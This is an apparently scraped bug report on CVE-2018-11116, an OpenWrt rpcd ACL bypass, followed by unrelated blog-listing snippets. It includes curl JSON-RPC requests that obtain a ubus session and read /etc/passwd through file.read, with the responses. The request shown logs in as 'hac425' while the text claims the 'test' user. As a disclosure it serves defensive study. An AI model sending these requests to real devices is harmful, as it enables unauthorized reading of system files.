User can access to ubus over HTTP. This way depend on rpcd service. When misconfigure the rpcd's ACL , It could lead the ACL don't work.

Steps to produce the problem

First you should get an machine running openwrt And install uhttpd and luci to provide http service

opkg update
opkg install luci

Then to install some tools to add users in openwrt。

opkg install shadow-common
opkg install shadow-useradd
opkg install rpcd-mod-file

And then I add 2 user and make them can login in rpcd by modiy the rpcd config file.

root@OpenWrt:~# cat /etc/config/rpcd 

config login
option username 'hac425'
option password '$p$hac425'
list read '*'
list write '*'
config login
       option username 'test'
       option password '$p$test'
       list read '*'
       list write '*'

Next I create an config file for provide ACL to user who's username is hac425 (the config file come from wiki for openwrt

root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json
{
       "hac425": {
               "description": "acl for hac425",
               "read": {
                       "ubus": {
                               "file": [ "*" ],
                               "log": [ "*" ],
                               "service": [ "*" ],
                      },
              },
               "write": {
                       "ubus": {
                               "file": [ "*" ],
                               "log": [ "*" ],
                               "service": [ "*" ],
                      },
              }
      }
}
root@OpenWrt:/usr/share/rpcd/acl.d#

This let hac425 can call all methods in  file namespace ( "file": [ "*" ] )

I didn't create the acl file for user who's name is test, It mean that test user can only call the methods defined in unauthenticated.json.

However , when I test it , I found that the user test can also call the methods which is only allowed to hac425 user.

For example, The test user can call read method in  file namespace which is not permited to him.

Next I would show it to you.

First I use test user's username and password to login , and get the ubus_rpc_session (this value should  be used to call other method defined in Acl config files)

06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123"  } ] }'  http://192.168.31.111/ubus

{"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}

Then use the ubus_rpc_session  to call read method in file namespace to read the content of /etc/passwd

06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }'  http://192.168.31.111/ubus
{"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nhac425:x:1000:1000::\/home\/hac425:\ntest:x:1001:1001::\/home\/test:\n"}]}

Then we could get the file content.

This means that I can use test user to call read method  which is not permited to test user.

Bypass the acl.

Conclusion

The vulneratility  may lead the rpcd acl don't work successful.

This lead the evil user can call the method which is only permited call by otherone user.

【CVE-2018-11116】openwrt rpcd 配置文件错误导致访问控制失效的更多相关文章

  1. 配置文件错误导致jenkins无法启动 org.xmlpull.v1.XmlPullParserException: only 1.0 is supported as <?xml version not '1.1' (position: START_DOCUMENT seen <?xml version=\'1.1\'... @1:19)

    org.xmlpull.v1.XmlPullParserException: only 1.0 is supported as <?xml version not '1.1' (position ...

  2. 报错——selinux配置文件修改错误导致无法启动虚拟机

    selinux配置文件修改错误导致无法启动虚拟机 问题 错误修改配置文件 [root@centos73 ~]# cat /etc/selinux/config # This file controls ...

  3. Linux安装Tomcat-Nginx-FastDFS-Redis-Solr-集群——【第九集-补充-热部署项目到tomcat中,但是数据库配置文件错误,中途停止部署,导致执行shutdow.sh报错异常: Could not contact localhost:8005. Tomcat may not be running error while shutting down】

    1,经过千辛万苦的尝试和百度,终于一个博客:http://stackmirror.caup.cn/page/skxugjqj0ldc关于catalina.sh文件的执行引起了我的注意: 2,我执行ca ...

  4. Linux在fstab中因配置错误导致服务器主机无法重启的问题应该如何解决

    fstab中配置错误导致系统无法启动的恢复方案 1制造错误的案例发生,在/etc/fstab中配置如下内容 结尾的倒数第一个为1表示进行磁盘检查,为0表示不进行磁盘检查,倒数第二个为0表示不备份,为1 ...

  5. 两个由于php.ini配置错误导致的报错:ajax图片上传报错和exec报错

    遇到了两个由于php.ini配置错误导致的报错:ajax图片上传报错和exec报错 首先第一个: 在做一个用ajax图片上传的功能中,php报了这样一个错误:File upload error - u ...

  6. 给虚拟机添加新硬盘并分区,fdisk查看分区,分区,重新读取分区表信息partprobe,格式化,挂载,查看分区挂载信息,自动挂载文件/etc/fstab,/etc/fstab文件错误导致重启崩溃后的修复

    1.虚拟机关机断电 2.添加硬盘 2.开机 3.fdisk -l查看刚才新添加的硬盘 [root@localhost ~]# fdisk -l 磁盘 /dev/sda:21.5 GB, 2147483 ...

  7. [svc]mount命令及解决因/etc/fstab错误导致系统不能启动故障

    mount命令-手动挂载设备 格式: mount [options] [-t fstype] [-o option] 设备 挂载点 mount -n -o remount,rw / - Mount t ...

  8. ORA-04031错误导致宕机案例分析

    今天遇到一起ORACLE数据库宕机案例,下面是对这起数据库宕机案例的原因进行分析.解读.分析过程中顺便记录一下这个案例的前因后果,攒点经验值,培养一下分析.解决问题的能力. 案例环境:   操作系统 ...

  9. ruby -- 问题解决(四)编码错误导致无法显示(2)

    从数据库中取得数据显示时报 incompatible character encodings: GBK and ASCII-8BIT或 incompatible character encodings ...

随机推荐

  1. POJ 1160

    #include <iostream> #define MAXN 305 #define inf 123456789 using namespace std; int _m[MAXN][M ...

  2. node开发环境配置

    node开发环境配置 用处 NodeJS——后台 JavaScript-前台 后台其他语言 1.PHP 2.Java 3.Pythonnode优势 1.性能高 nodejs php 86 1s 1分半 ...

  3. spring自定义注解拦截器的配置

    1.创建注解文件 (文件格式为注解) 这里面什么都不需要写 文件名就是注解名称 如下 是@anno package com.ABC123.anno; import java.lang.annotati ...

  4. linux 编译安装amqp

    背景: 下面的内容是我根据网上博客小松的文章 https://www.phpsong.com/2223.html 做的修改,因为我走到make 编译amqp这步报错 最开始报下面的这个错误,是因为要安 ...

  5. 以整体思维看问题:解决单页应用,系统角色请求覆盖身份唯一标识(本项目中是session_id命名的)发送请求问题

    以前都是开始一段废话的,现在直接进入主题,首先介绍一下一些概念: 单页应用: 优点: 具有桌面应用的即时性.网站的可移植性和可访问性. 用户体验好.快,内容的改变不需要重新加载整个页面,web应用更具 ...

  6. windows10下找回照片查看器的方法(仅作记录)

    Windows Registry Editor Version 5.00 ; Change Extension's File Type [HKEY_CURRENT_USER\Software\Clas ...

  7. EF Core 实现多租户

    目录 SAAS 和多租户 多租户数据隔离方案 使用 EF Core 简单实现多租户 单数据库实现 多数据库实现 源代码 参考 SAAS 和多租户 SaaS(软件及服务)区别于其他应用程序的主要特征就是 ...

  8. rails 过滤掉所有的html标签 strip_tags

      strip_tags(html) Strips all HTML tags from the html, including comments. This usesthe html-scanner ...

  9. C# 开发者审查代码的41条建议

    1. 确保没有任何警告(warnings). 2.如果先执行Code Analysis(启用所有Microsoft Rules)再消除所有警告就更好了. 3. 去掉所有没有用到的usings.编码过程 ...

  10. emberjs 按年月分组

    一个集合,里面有年和月的属性,按照年和月进行分组显示数据 + item.TopicMonth }).map(function (value, key) { return { time: { year: ...